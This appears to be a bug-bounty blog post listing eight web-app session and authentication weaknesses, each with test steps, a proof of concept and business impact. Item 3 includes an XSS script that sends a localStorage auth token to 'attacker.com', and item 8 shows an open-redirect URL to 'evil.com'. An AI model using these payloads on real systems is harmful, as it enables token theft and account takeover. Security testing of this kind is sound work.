1️⃣ Failure to Invalidate Session After Password Change
Description
When a user changes their password, old sessions should be invalidated to prevent an attacker with a stolen session from continuing to use it.
How to Test
- Log into the app on Browser A.
- Copy session token (via cookies or local storage).
- Log in again on Browser B with the same account.
- Change the password on Browser B.
- Try to keep using Browser A (e.g., refresh pages or make API calls).
PoC
If Browser A remains authenticated and still has access, session invalidation is broken.
Business Impact
Attackers with stolen sessions remain logged in, even after the victim secures their account by changing the password.
2️⃣ Failure to Invalidate Sessions After Logout (Client + Server Side)
Description
Logging out should invalidate session tokens both client-side and server-side. If only removed locally, an attacker with a valid token can still use it.
How to Test
- Log in and capture the session token.
- Perform a logout from the UI.
- Replay an API request with the old session token in Burp/Postman.
PoC
If the request still succeeds, server-side logout is missing.
Business Impact
Compromised tokens remain valid, leaving users vulnerable to account hijacking.
3️⃣ Sensitive Token Disclosure via Local Storage
Description
Sensitive tokens stored in localStorage or sessionStorage are accessible via JavaScript and can be stolen through XSS.
How to Test
- Open DevTools → Application tab.
- Check
localStorageandsessionStoragefor sensitive tokens (authToken,jwt,resetToken, etc.). - Try replaying them in API calls.
PoC
<script>
fetch('https://attacker.com/steal?token=' + localStorage.getItem('authToken'));
</script>
Business Impact
Exposes tokens to theft via XSS, leading to account takeover.
4️⃣ Lack of Security Headers on Sensitive Endpoints
Description
Missing security headers (like CSP, HSTS, X-Frame-Options) weakens browser-side protections.
How to Test
- Visit sensitive endpoints (e.g.,
/login,/account,/settings). - Check response headers using Burp or DevTools → Network tab.
- Look for missing headers:
Content-Security-PolicyStrict-Transport-SecurityX-Frame-OptionsX-Content-Type-Options
PoC
Screenshot of missing headers.
Business Impact
Increases risk of clickjacking, MITM attacks, and XSS exploitation.
5️⃣ No Password Policy
Description
If weak or guessable passwords are allowed, attackers can brute force accounts easily.
How to Test
- Try setting a weak password (
123456,password,qwerty). - Check if minimum length, complexity, or reuse checks are enforced.
PoC
If the app accepts 123456, report it.
Business Impact
Weak accounts can be brute-forced or guessed, leading to compromise.
6️⃣ No Rate Limiting on Login or Signup
Description
Rate limiting prevents brute force and credential stuffing. If missing, attackers can automate login attempts.
How to Test
- Use Burp Intruder or a script to send multiple login attempts.
- Observe if any lockouts, delays, or CAPTCHAs are triggered.
PoC
Show 50+ requests within seconds, all processed normally.
Business Impact
Allows brute-force attacks, risking account takeover.
7️⃣ No Password Confirmation on Delete Account
Description
Account deletion should require password re-entry. Without it, attackers with temporary access (e.g., CSRF or borrowed session) can delete accounts.
How to Test
- Log in.
- Go to delete account page.
- Check if password confirmation is required.
- If deletion is possible with one click, it’s vulnerable.
PoC
Show account deletion without re-entering password.
Business Impact
Attackers with short-term access can permanently delete victim accounts.
8️⃣ Open Redirect on Login Page
Description
If the login page accepts a redirect or next parameter without validation, attackers can redirect users to malicious sites after login.
How to Test
- Find login URL with a parameter like:
/login?next=https://evil.com - Login and observe redirection.
- If it redirects to
evil.com, it’s vulnerable.
PoC
https://target.com/login?next=https://evil.com
Business Impact
Enables phishing, credential theft, and chaining with OAuth attacks.
No comments yet